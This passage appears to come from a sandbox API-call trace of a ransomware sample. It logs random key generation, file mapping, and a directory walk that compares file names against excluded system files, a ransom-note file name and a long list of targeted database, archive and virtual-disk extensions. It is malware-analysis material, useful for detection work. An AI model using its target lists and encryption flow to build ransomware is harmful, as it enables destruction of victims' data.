dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.524] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28672) returned 1 [0065.524] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.524] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0065.524] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.524] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0065.525] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0065.525] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.525] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7300, lpName=0x0) returned 0x118 [0065.527] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7300) returned 0x190000 [0065.533] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0065.534] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0065.534] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.534] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0065.534] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0065.534] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0065.534] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0065.534] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0065.534] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0065.534] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0065.534] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0065.534] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0065.534] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0065.534] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0065.535] CloseHandle (hObject=0x118) returned 1 [0065.535] CloseHandle (hObject=0x164) returned 1 [0065.535] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0065.535] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0065.535] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0065.535] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x668c5a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfee8082e, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News~.feed-ms", cAlternateFileName="MSNBCN~1.FEE")) returned 1 [0065.535] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0065.535] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="aoldtz.exe") returned 1 [0065.535] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2=".") returned 1 [0065.535] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="..") returned 1 [0065.535] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="windows") returned -1 [0065.535] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="bootmgr") returned 1 [0065.535] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="temp") returned -1 [0065.535] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="pagefile.sys") returned -1 [0065.535] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="boot") returned 1 [0065.535] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="ids.txt") returned 1 [0065.535] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="ntuser.dat") returned -1 [0065.535] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="perflogs") returned -1 [0065.535] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="MSBuild") returned 1 [0065.535] lstrlenW (lpString="MSNBC News~.feed-ms") returned 19 [0065.536] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms") returned 96 [0065.536] lstrcpyW (in: lpString1=0x2cce48c, lpString2="MSNBC News~.feed-ms" | out: lpString1="MSNBC News~.feed-ms") returned="MSNBC News~.feed-ms" [0065.536] lstrlenW (lpString="MSNBC News~.feed-ms") returned 19 [0065.536] lstrlenW (lpString="Ares865") returned 7 [0065.536] lstrcmpiW (lpString1="feed-ms", lpString2="Ares865") returned 1 [0065.536] lstrlenW (lpString=".dll") returned 4 [0065.536] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2=".dll") returned 1 [0065.536] lstrlenW (lpString=".lnk") returned 4 [0065.536] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2=".lnk") returned 1 [0065.536] lstrlenW (lpString=".ini") returned 4 [0065.536] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2=".ini") returned 1 [0065.536] lstrlenW (lpString=".sys") returned 4 [0065.536] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2=".sys") returned 1 [0065.536] lstrlenW (lpString="MSNBC News~.feed-ms") returned 19 [0065.536] lstrlenW (lpString="bak") returned 3 [0065.536] lstrcmpiW (lpString1="-ms", lpString2="bak") returned 1 [0065.536] lstrlenW (lpString="ba_") returned 3 [0065.536] lstrcmpiW (lpString1="-ms", lpString2="ba_") returned 1 [0065.536] lstrlenW (lpString="dbb") returned 3 [0065.536] lstrcmpiW (lpString1="-ms", lpString2="dbb") returned 1 [0065.536] lstrlenW (lpString="vmdk") returned 4 [0065.536] lstrcmpiW (lpString1="d-ms", lpString2="vmdk") returned -1 [0065.536] lstrlenW (lpString="rar") returned 3 [0065.536] lstrcmpiW (lpString1="-ms", lpString2="rar") returned -1 [0065.536] lstrlenW (lpString="zip") returned 3 [0065.536] lstrcmpiW (lpString1="-ms", lpString2="zip") returned -1 [0065.536] lstrlenW (lpString="tgz") returned 3 [0065.536] lstrcmpiW (lpString1="-ms", lpString2="tgz") returned -1 [0065.536] lstrlenW (lpString="vbox") returned 4 [0065.536] lstrcmpiW (lpString1="d-ms", lpString2="vbox") returned -1 [0065.536] lstrlenW (lpString="vdi") returned 3 [0065.536] lstrcmpiW (lpString1="-ms", lpString2="vdi") returned -1 [0065.536] lstrlenW (lpString="vhd") returned 3 [0065.536] lstrcmpiW (lpString1="-ms", lpString2="vhd") returned -1 [0065.536] lstrlenW (lpString="vhdx") returned 4 [0065.536] lstrcmpiW (lpString1="d-ms", lpString2="vhdx") returned -1 [0065.536] lstrlenW (lpString="avhd") returned 4 [0065.536] lstrcmpiW (lpString1="d-ms", lpString2="avhd") returned 1 [0065.537] lstrlenW (lpString="db") returned 2 [0065.537] lstrcmpiW (lpString1="ms", lpString2="db") returned 1 [0065.537] lstrlenW (lpString="db2") returned 3 [0065.537] lstrcmpiW (lpString1="-ms", lpString2="db2") returned 1 [0065.537] lstrlenW (lpString="db3") returned 3 [0065.537] lstrcmpiW (lpString1="-ms", lpString2="db3") returned 1 [0065.537] lstrlenW (lpString="dbf") returned 3 [0065.537] lstrcmpiW (lpString1="-ms", lpString2="dbf") returned 1 [0065.537] lstrlenW (lpString="mdf") returned 3 [0065.537] lstrcmpiW (lpString1="-ms", lpString2="mdf") returned 1 [0065.537] lstrlenW (lpString="mdb") returned 3 [0065.537] lstrcmpiW (lpString1="-ms", lpString2="mdb") returned 1 [0065.537] lstrlenW (lpString="sql") returned 3 [0065.537] lstrcmpiW (lpString1="-ms", lpString2="sql") returned -1 [0065.537] lstrlenW (lpString="sqlite") returned 6 [0065.537] lstrcmpiW (lpString1="eed-ms", lpString2="sqlite") returned -1 [0065.537] lstrlenW (lpString="sqlite3") returned 7 [0065.537] lstrcmpiW (lpString1="feed-ms", lpString2="sqlite3") returned -1 [0065.537] lstrlenW (lpString="sqlitedb") returned 8 [0065.537] lstrcmpiW (lpString1=".feed-ms", lpString2="sqlitedb") returned -1 [0065.537] lstrlenW (lpString="xml") returned 3 [0065.537] lstrcmpiW (lpString1="-ms", lpString2="xml") returned -1 [0065.537] lstrlenW (lpString="$er") returned 3 [0065.537] lstrcmpiW (lpString1="-ms", lpString2="$er") returned 1 [0065.537] lstrlenW (lpString="4dd") returned 3 [0065.537] lstrcmpiW (lpString1="-ms", lpString2="4dd") returned 1 [0065.537] lstrlenW (lpString="4dl") returned 3 [0065.537] lstrcmpiW (lpString1="-ms", lpString2="4dl") returned 1 [0065.537] lstrlenW (lpString="^^^") returned 3 [0065.537] lstrcmpiW (lpString1="-ms", lpString2="^^^") returned 1 [0065.537] lstrlenW (lpString="abs") returned 3 [0065.537] lstrcmpiW (lpString1="-ms", lpString2="abs") returned 1 [0065.537] lstrlenW (lpString="abx") returned 3 [0065.537] lstrcmpiW (lpString1="-ms", lpString2="abx") returned 1 [0065.537] lstrlenW (lpString="accdb") returned 5 [0065.537] lstrcmpiW (lpString1="ed-ms", lpString2="accdb") returned 1 [0065.537] lstrlenW (lpString="accdc") returned 5 [0065.537] lstrcmpiW (lpString1="ed-ms", lpString2="accdc") returned 1 [0065.538] lstrlenW (lpString="accde") returned 5 [0065.538] lstrcmpiW (lpString1="ed-ms", lpString2="accde") returned 1 [0065.538] lstrlenW (lpString="accdr") returned 5 [0065.538] lstrcmpiW (lpString1="ed-ms", lpString2="accdr") returned 1 [0065.538] lstrlenW (lpString="accdt") returned 5 [0065.538] lstrcmpiW (lpString1="ed-ms", lpString2="accdt") returned 1 [0065.538] lstrlenW (lpString="accdw") returned 5 [0065.538] lstrcmpiW (lpString1="ed-ms", lpString2="accdw") returned 1 [0065.538] lstrlenW (lpString="accft") returned 5 [0065.538] lstrcmpiW (lpString1="ed-ms", lpString2="accft") returned 1 [0065.538] lstrlenW (lpString="adb") returned 3 [0065.538] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0065.538] lstrlenW (lpString="adb") returned 3 [0065.538] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0065.538] lstrlenW (lpString="ade") returned 3 [0065.538] lstrcmpiW (lpString1="-ms", lpString2="ade") returned 1 [0065.538] lstrlenW (lpString="adf") returned 3 [0065.538] lstrcmpiW (lpString1="-ms", lpString2="adf") returned 1 [0065.538] lstrlenW (lpString="adn") returned 3 [0065.538] lstrcmpiW (lpString1="-ms", lpString2="adn") returned 1 [0065.538] lstrlenW (lpString="adp") returned 3 [0065.538] lstrcmpiW (lpString1="-ms", lpString2="adp") returned 1 [0065.538] lstrlenW (lpString="alf") returned 3 [0065.538] lstrcmpiW (lpString1="-ms", lpString2="alf") returned 1 [0065.538] lstrlenW (lpString="ask") returned 3 [0065.538] lstrcmpiW (lpString1="-ms", lpString2="ask") returned 1 [0065.538] lstrlenW (lpString="btr") returned 3 [0065.538] lstrcmpiW (lpString1="-ms", lpString2="btr") returned 1 [0065.538] lstrlenW (lpString="cat") returned 3 [0065.538] lstrcmpiW (lpString1="-ms", lpString2="cat") returned 1 [0065.538] lstrlenW (lpString="cdb") returned 3 [0065.538] lstrcmpiW (lpString1="-ms", lpString2="cdb") returned 1 [0065.538] lstrlenW (lpString="ckp") returned 3 [0065.538] lstrcmpiW (lpString1="-ms", lpString2="ckp") returned 1 [0065.538] lstrlenW (lpString="cma") returned 3 [0065.538] lstrcmpiW (lpString1="-ms", lpString2="cma") returned 1 [0065.538] lstrlenW (lpString="cpd") returned 3 [0065.539] lstrcmpiW (lpString1="-ms", lpString2="cpd") returned 1 [0065.539] lstrlenW (lpString="dacpac") returned 6 [0065.539] lstrcmpiW (lpString1="eed-ms", lpString2="dacpac") returned 1 [0065.539] lstrlenW (lpString="dad") returned 3 [0065.539] lstrcmpiW (lpString1="-ms", lpString2="dad") returned 1 [0065.539] lstrlenW (lpString="dadiagrams") returned 10 [0065.539] lstrcmpiW (lpString1="s~.feed-ms", lpString2="dadiagrams") returned 1 [0065.539] lstrlenW (lpString="daschema") returned 8 [0065.539] lstrcmpiW (lpString1=".feed-ms", lpString2="daschema") returned -1 [0065.539] lstrlenW (lpString="db-journal") returned 10 [0065.539] lstrcmpiW (lpString1="s~.feed-ms", lpString2="db-journal") returned 1 [0065.539] lstrlenW (lpString="db-shm") returned 6 [0065.539] lstrcmpiW (lpString1="eed-ms", lpString2="db-shm") returned 1 [0065.539] lstrlenW (lpString="db-wal") returned 6 [0065.539] lstrcmpiW (lpString1="eed-ms", lpString2="db-wal") returned 1 [0065.539] lstrlenW (lpString="dbc") returned 3 [0065.539] lstrcmpiW (lpString1="-ms", lpString2="dbc") returned 1 [0065.539] lstrlenW (lpString="dbs") returned 3 [0065.539] lstrcmpiW (lpString1="-ms", lpString2="dbs") returned 1 [0065.539] lstrlenW (lpString="dbt") returned 3 [0065.539] lstrcmpiW (lpString1="-ms", lpString2="dbt") returned 1 [0065.539] lstrlenW (lpString="dbv") returned 3 [0065.539] lstrcmpiW (lpString1="-ms", lpString2="dbv") returned 1 [0065.539] lstrlenW (lpString="dbx") returned 3 [0065.539] lstrcmpiW (lpString1="-ms", lpString2="dbx") returned 1 [0065.539] lstrlenW (lpString="dcb") returned 3 [0065.539] lstrcmpiW (lpString1="-ms", lpString2="dcb") returned 1 [0065.539] lstrlenW (lpString="dct") returned 3 [0065.539] lstrcmpiW (lpString1="-ms", lpString2="dct") returned 1 [0065.539] lstrlenW (lpString="dcx") returned 3 [0065.539] lstrcmpiW (lpString1="-ms", lpString2="dcx") returned 1 [0065.539] lstrlenW (lpString="ddl") returned 3 [0065.539] lstrcmpiW (lpString1="-ms", lpString2="ddl") returned 1 [0065.539] lstrlenW (lpString="dlis") returned 4 [0065.539] lstrcmpiW (lpString1="d-ms", lpString2="dlis") returned 1 [0065.539] lstrlenW (lpString="dp1") returned 3 [0065.539] lstrcmpiW (lpString1="-ms", lpString2="dp1") returned 1 [0065.540] lstrlenW (lpString="dqy") returned 3 [0065.540] lstrcmpiW (lpString1="-ms", lpString2="dqy") returned 1 [0065.540] lstrlenW (lpString="dsk") returned 3 [0065.540] lstrcmpiW (lpString1="-ms", lpString2="dsk") returned 1 [0065.540] lstrlenW (lpString="dsn") returned 3 [0065.540] lstrcmpiW (lpString1="-ms", lpString2="dsn") returned 1 [0065.540] lstrlenW (lpString="dtsx") returned 4 [0065.540] lstrcmpiW (lpString1="d-ms", lpString2="dtsx") returned -1 [0065.540] lstrlenW (lpString="dxl") returned 3 [0065.540] lstrcmpiW (lpString1="-ms", lpString2="dxl") returned 1 [0065.540] lstrlenW (lpString="eco") returned 3 [0065.540] lstrcmpiW (lpString1="-ms", lpString2="eco") returned 1 [0065.540] lstrlenW (lpString="ecx") returned 3 [0065.540] lstrcmpiW (lpString1="-ms", lpString2="ecx") returned 1 [0065.540] lstrlenW (lpString="edb") returned 3 [0065.540] lstrcmpiW (lpString1="-ms", lpString2="edb") returned 1 [0065.540] lstrlenW (lpString="epim") returned 4 [0065.540] lstrcmpiW (lpString1="d-ms", lpString2="epim") returned -1 [0065.540] lstrlenW (lpString="fcd") returned 3 [0065.540] lstrcmpiW (lpString1="-ms", lpString2="fcd") returned 1 [0065.540] lstrlenW (lpString="fdb") returned 3 [0065.540] lstrcmpiW (lpString1="-ms", lpString2="fdb") returned 1 [0065.540] lstrlenW (lpString="fic") returned 3 [0065.540] lstrcmpiW (lpString1="-ms", lpString2="fic") returned 1 [0065.540] lstrlenW (lpString="flexolibrary") returned 12 [0065.540] lstrcmpiW (lpString1="ews~.feed-ms", lpString2="flexolibrary") returned -1 [0065.540] lstrlenW (lpString="fm5") returned 3 [0065.540] lstrcmpiW (lpString1="-ms", lpString2="fm5") returned 1 [0065.540] lstrlenW (lpString="fmp") returned 3 [0065.540] lstrcmpiW (lpString1="-ms", lpString2="fmp") returned 1 [0065.540] lstrlenW (lpString="fmp12") returned 5 [0065.540] lstrcmpiW (lpString1="ed-ms", lpString2="fmp12") returned -1 [0065.540] lstrlenW (lpString="fmpsl") returned 5 [0065.540] lstrcmpiW (lpString1="ed-ms", lpString2="fmpsl") returned -1 [0065.540] lstrlenW (lpString="fol") returned 3 [0065.540] lstrcmpiW (lpString1="-ms", lpString2="fol") returned 1 [0065.540] lstrlenW (lpString="fp3") returned 3 [0065.540] lstrcmpiW (lpString1="-ms", lpString2="fp3") returned 1 [0065.541] lstrlenW (lpString="fp4") returned 3 [0065.541] lstrcmpiW (lpString1="-ms", lpString2="fp4") returned 1 [0065.541] lstrlenW (lpString="fp5") returned 3 [0065.541] lstrcmpiW (lpString1="-ms", lpString2="fp5") returned 1 [0065.541] lstrlenW (lpString="fp7") returned 3 [0065.541] lstrcmpiW (lpString1="-ms", lpString2="fp7") returned 1 [0065.541] lstrlenW (lpString="fpt") returned 3 [0065.541] lstrcmpiW (lpString1="-ms", lpString2="fpt") returned 1 [0065.541] lstrlenW (lpString="frm") returned 3 [0065.541] lstrcmpiW (lpString1="-ms", lpString2="frm") returned 1 [0065.541] lstrlenW (lpString="gdb") returned 3 [0065.541] lstrcmpiW (lpString1="-ms", lpString2="gdb") returned 1 [0065.541] lstrlenW (lpString="gdb") returned 3 [0065.541] lstrcmpiW (lpString1="-ms", lpString2="gdb") returned 1 [0065.541] lstrlenW (lpString="grdb") returned 4 [0065.541] lstrcmpiW (lpString1="d-ms", lpString2="grdb") returned -1 [0065.541] lstrlenW (lpString="gwi") returned 3 [0065.541] lstrcmpiW (lpString1="-ms", lpString2="gwi") returned 1 [0065.541] lstrlenW (lpString="hdb") returned 3 [0065.541] lstrcmpiW (lpString1="-ms", lpString2="hdb") returned 1 [0065.541] lstrlenW (lpString="his") returned 3 [0065.541] lstrcmpiW (lpString1="-ms", lpString2="his") returned 1 [0065.541] lstrlenW (lpString="ib") returned 2 [0065.541] lstrcmpiW (lpString1="ms", lpString2="ib") returned 1 [0065.541] lstrlenW (lpString="idb") returned 3 [0065.541] lstrcmpiW (lpString1="-ms", lpString2="idb") returned 1 [0065.541] lstrlenW (lpString="ihx") returned 3 [0065.541] lstrcmpiW (lpString1="-ms", lpString2="ihx") returned 1 [0065.541] lstrlenW (lpString="itdb") returned 4 [0065.541] lstrcmpiW (lpString1="d-ms", lpString2="itdb") returned -1 [0065.541] lstrlenW (lpString="itw") returned 3 [0065.541] lstrcmpiW (lpString1="-ms", lpString2="itw") returned 1 [0065.541] lstrlenW (lpString="jet") returned 3 [0065.541] lstrcmpiW (lpString1="-ms", lpString2="jet") returned 1 [0065.541] lstrlenW (lpString="jtx") returned 3 [0065.541] lstrcmpiW (lpString1="-ms", lpString2="jtx") returned 1 [0065.541] lstrlenW (lpString="kdb") returned 3 [0065.541] lstrcmpiW (lpString1="-ms", lpString2="kdb") returned 1 [0065.542] lstrlenW (lpString="kexi") returned 4 [0065.542] lstrcmpiW (lpString1="d-ms", lpString2="kexi") returned -1 [0065.542] lstrlenW (lpString="kexic") returned 5 [0065.542] lstrcmpiW (lpString1="ed-ms", lpString2="kexic") returned -1 [0065.542] lstrlenW (lpString="kexis") returned 5 [0065.542] lstrcmpiW (lpString1="ed-ms", lpString2="kexis") returned -1 [0065.542] lstrlenW (lpString="lgc") returned 3 [0065.542] lstrcmpiW (lpString1="-ms", lpString2="lgc") returned 1 [0065.542] lstrlenW (lpString="lwx") returned 3 [0065.542] lstrcmpiW (lpString1="-ms", lpString2="lwx") returned 1 [0065.542] lstrlenW (lpString="maf") returned 3 [0065.542] lstrcmpiW (lpString1="-ms", lpString2="maf") returned 1 [0065.542] lstrlenW (lpString="maq") returned 3 [0065.542] lstrcmpiW (lpString1="-ms", lpString2="maq") returned 1 [0065.542] lstrlenW (lpString="mar") returned 3 [0065.542] lstrcmpiW (lpString1="-ms", lpString2="mar") returned 1 [0065.542] lstrlenW (lpString="marshal") returned 7 [0065.542] lstrcmpiW (lpString1="feed-ms", lpString2="marshal") returned -1 [0065.542] lstrlenW (lpString="mas") returned 3 [0065.542] lstrcmpiW (lpString1="-ms", lpString2="mas") returned 1 [0065.542] lstrlenW (lpString="mav") returned 3 [0065.542] lstrcmpiW (lpString1="-ms", lpString2="mav") returned 1 [0065.542] lstrlenW (lpString="maw") returned 3 [0065.542] lstrcmpiW (lpString1="-ms", lpString2="maw") returned 1 [0065.542] lstrlenW (lpString="mdbhtml") returned 7 [0065.542] lstrcmpiW (lpString1="feed-ms", lpString2="mdbhtml") returned -1 [0065.542] lstrlenW (lpString="mdn") returned 3 [0065.542] lstrcmpiW (lpString1="-ms", lpString2="mdn") returned 1 [0065.542] lstrlenW (lpString="mdt") returned 3 [0065.542] lstrcmpiW (lpString1="-ms", lpString2="mdt") returned 1 [0065.542] lstrlenW (lpString="mfd") returned 3 [0065.542] lstrcmpiW (lpString1="-ms", lpString2="mfd") returned 1 [0065.542] lstrlenW (lpString="mpd") returned 3 [0065.542] lstrcmpiW (lpString1="-ms", lpString2="mpd") returned 1 [0065.542] lstrlenW (lpString="mrg") returned 3 [0065.542] lstrcmpiW (lpString1="-ms", lpString2="mrg") returned 1 [0065.542] lstrlenW (lpString="mud") returned 3 [0065.543] lstrcmpiW (lpString1="-ms", lpString2="mud") returned -1 [0065.543] lstrlenW (lpString="mwb") returned 3 [0065.543] lstrcmpiW (lpString1="-ms", lpString2="mwb") returned -1 [0065.543] lstrlenW (lpString="myd") returned 3 [0065.543] lstrcmpiW (lpString1="-ms", lpString2="myd") returned -1 [0065.543] lstrlenW (lpString="ndf") returned 3 [0065.543] lstrcmpiW (lpString1="-ms", lpString2="ndf") returned -1 [0065.543] lstrlenW (lpString="nnt") returned 3 [0065.543] lstrcmpiW (lpString1="-ms", lpString2="nnt") returned -1 [0065.543] lstrlenW (lpString="nrmlib") returned 6 [0065.543] lstrcmpiW (lpString1="eed-ms", lpString2="nrmlib") returned -1 [0065.543] lstrlenW (lpString="ns2") returned 3 [0065.543] lstrcmpiW (lpString1="-ms", lpString2="ns2") returned -1 [0065.543] lstrlenW (lpString="ns3") returned 3 [0065.543] lstrcmpiW (lpString1="-ms", lpString2="ns3") returned -1 [0065.543] lstrlenW (lpString="ns4") returned 3 [0065.543] lstrcmpiW (lpString1="-ms", lpString2="ns4") returned -1 [0065.543] lstrlenW (lpString="nsf") returned 3 [0065.543] lstrcmpiW (lpString1="-ms", lpString2="nsf") returned -1 [0065.543] lstrlenW (lpString="nv") returned 2 [0065.543] lstrcmpiW (lpString1="ms", lpString2="nv") returned -1 [0065.543] lstrlenW (lpString="nv2") returned 3 [0065.543] lstrcmpiW (lpString1="-ms", lpString2="nv2") returned -1 [0065.543] lstrlenW (lpString="nwdb") returned 4 [0065.543] lstrcmpiW (lpString1="d-ms", lpString2="nwdb") returned -1 [0065.543] lstrlenW (lpString="nyf") returned 3 [0065.543] lstrcmpiW (lpString1="-ms", lpString2="nyf") returned -1 [0065.543] lstrlenW (lpString="odb") returned 3 [0065.543] lstrcmpiW (lpString1="-ms", lpString2="odb") returned -1 [0065.543] lstrlenW (lpString="odb") returned 3 [0065.543] lstrcmpiW (lpString1="-ms", lpString2="odb") returned -1 [0065.543] lstrlenW (lpString="oqy") returned 3 [0065.543] lstrcmpiW (lpString1="-ms", lpString2="oqy") returned -1 [0065.543] lstrlenW (lpString="ora") returned 3 [0065.543] lstrcmpiW (lpString1="-ms", lpString2="ora") returned -1 [0065.543] lstrlenW (lpString="orx") returned 3 [0065.543] lstrcmpiW (lpString1="-ms", lpString2="orx") returned -1 [0065.544] lstrlenW (lpString="owc") returned 3 [0065.544] lstrcmpiW (lpString1="-ms", lpString2="owc") returned -1 [0065.544] lstrlenW (lpString="p96") returned 3 [0065.544] lstrcmpiW (lpString1="-ms", lpString2="p96") returned -1 [0065.544] lstrlenW (lpString="p97") returned 3 [0065.544] lstrcmpiW (lpString1="-ms", lpString2="p97") returned -1 [0065.544] lstrlenW (lpString="pan") returned 3 [0065.544] lstrcmpiW (lpString1="-ms", lpString2="pan") returned -1 [0065.544] lstrlenW (lpString="pdb") returned 3 [0065.544] lstrcmpiW (lpString1="-ms", lpString2="pdb") returned -1 [0065.544] lstrlenW (lpString="pdm") returned 3 [0065.544] lstrcmpiW (lpString1="-ms", lpString2="pdm") returned -1 [0065.544] lstrlenW (lpString="pnz") returned 3 [0065.544] lstrcmpiW (lpString1="-ms", lpString2="pnz") returned -1 [0065.544] lstrlenW (lpString="qry") returned 3 [0065.544] lstrcmpiW (lpString1="-ms", lpString2="qry") returned -1 [0065.544] lstrlenW (lpString="qvd") returned 3 [0065.544] lstrcmpiW (lpString1="-ms", lpString2="qvd") returned -1 [0065.544] lstrlenW (lpString="rbf") returned 3 [0065.544] lstrcmpiW (lpString1="-ms", lpString2="rbf") returned -1 [0065.544] lstrlenW (lpString="rctd") returned 4 [0065.544] lstrcmpiW (lpString1="d-ms", lpString2="rctd") returned -1 [0065.544] lstrlenW (lpString="rod") returned 3 [0065.544] lstrcmpiW (lpString1="-ms", lpString2="rod") returned -1 [0065.544] lstrlenW (lpString="rodx") returned 4 [0065.544] lstrcmpiW (lpString1="d-ms", lpString2="rodx") returned -1 [0065.544] lstrlenW (lpString="rpd") returned 3 [0065.544] lstrcmpiW (lpString1="-ms", lpString2="rpd") returned -1 [0065.544] lstrlenW (lpString="rsd") returned 3 [0065.544] lstrcmpiW (lpString1="-ms", lpString2="rsd") returned -1 [0065.544] lstrlenW (lpString="sas7bdat") returned 8 [0065.544] lstrcmpiW (lpString1=".feed-ms", lpString2="sas7bdat") returned -1 [0065.544] lstrlenW (lpString="sbf") returned 3 [0065.544] lstrcmpiW (lpString1="-ms", lpString2="sbf") returned -1 [0065.544] lstrlenW (lpString="scx") returned 3 [0065.544] lstrcmpiW (lpString1="-ms", lpString2="scx") returned -1 [0065.544] lstrlenW (lpString="sdb") returned 3 [0065.544] lstrcmpiW (lpString1="-ms", lpString2="sdb") returned -1 [0065.545] lstrlenW (lpString="sdc") returned 3 [0065.545] lstrcmpiW (lpString1="-ms", lpString2="sdc") returned -1 [0065.545] lstrlenW (lpString="sdf") returned 3 [0065.545] lstrcmpiW (lpString1="-ms", lpString2="sdf") returned -1 [0065.545] lstrlenW (lpString="sis") returned 3 [0065.545] lstrcmpiW (lpString1="-ms", lpString2="sis") returned -1 [0065.545] lstrlenW (lpString="spq") returned 3 [0065.545] lstrcmpiW (lpString1="-ms", lpString2="spq") returned -1 [0065.545] lstrlenW (lpString="te") returned 2 [0065.545] lstrcmpiW (lpString1="ms", lpString2="te") returned -1 [0065.545] lstrlenW (lpString="teacher") returned 7 [0065.545] lstrcmpiW (lpString1="feed-ms", lpString2="teacher") returned -1 [0065.545] lstrlenW (lpString="tmd") returned 3 [0065.545] lstrcmpiW (lpString1="-ms", lpString2="tmd") returned -1 [0065.545] lstrlenW (lpString="tps") returned 3 [0065.545] lstrcmpiW (lpString1="-ms", lpString2="tps") returned -1 [0065.545] lstrlenW (lpString="trc") returned 3 [0065.545] lstrcmpiW (lpString1="-ms", lpString2="trc") returned -1 [0065.545] lstrlenW (lpString="trc") returned 3 [0065.545] lstrcmpiW (lpString1="-ms", lpString2="trc") returned -1 [0065.545] lstrlenW (lpString="trm") returned 3 [0065.545] lstrcmpiW (lpString1="-ms", lpString2="trm") returned -1 [0065.545] lstrlenW (lpString="udb") returned 3 [0065.545] lstrcmpiW (lpString1="-ms", lpString2="udb") returned -1 [0065.545] lstrlenW (lpString="udl") returned 3 [0065.545] lstrcmpiW (lpString1="-ms", lpString2="udl") returned -1 [0065.545] lstrlenW (lpString="usr") returned 3 [0065.545] lstrcmpiW (lpString1="-ms", lpString2="usr") returned -1 [0065.545] lstrlenW (lpString="v12") returned 3 [0065.545] lstrcmpiW (lpString1="-ms", lpString2="v12") returned -1 [0065.545] lstrlenW (lpString="vis") returned 3 [0065.545] lstrcmpiW (lpString1="-ms", lpString2="vis") returned -1 [0065.545] lstrlenW (lpString="vpd") returned 3 [0065.545] lstrcmpiW (lpString1="-ms", lpString2="vpd") returned -1 [0065.545] lstrlenW (lpString="vvv") returned 3 [0065.545] 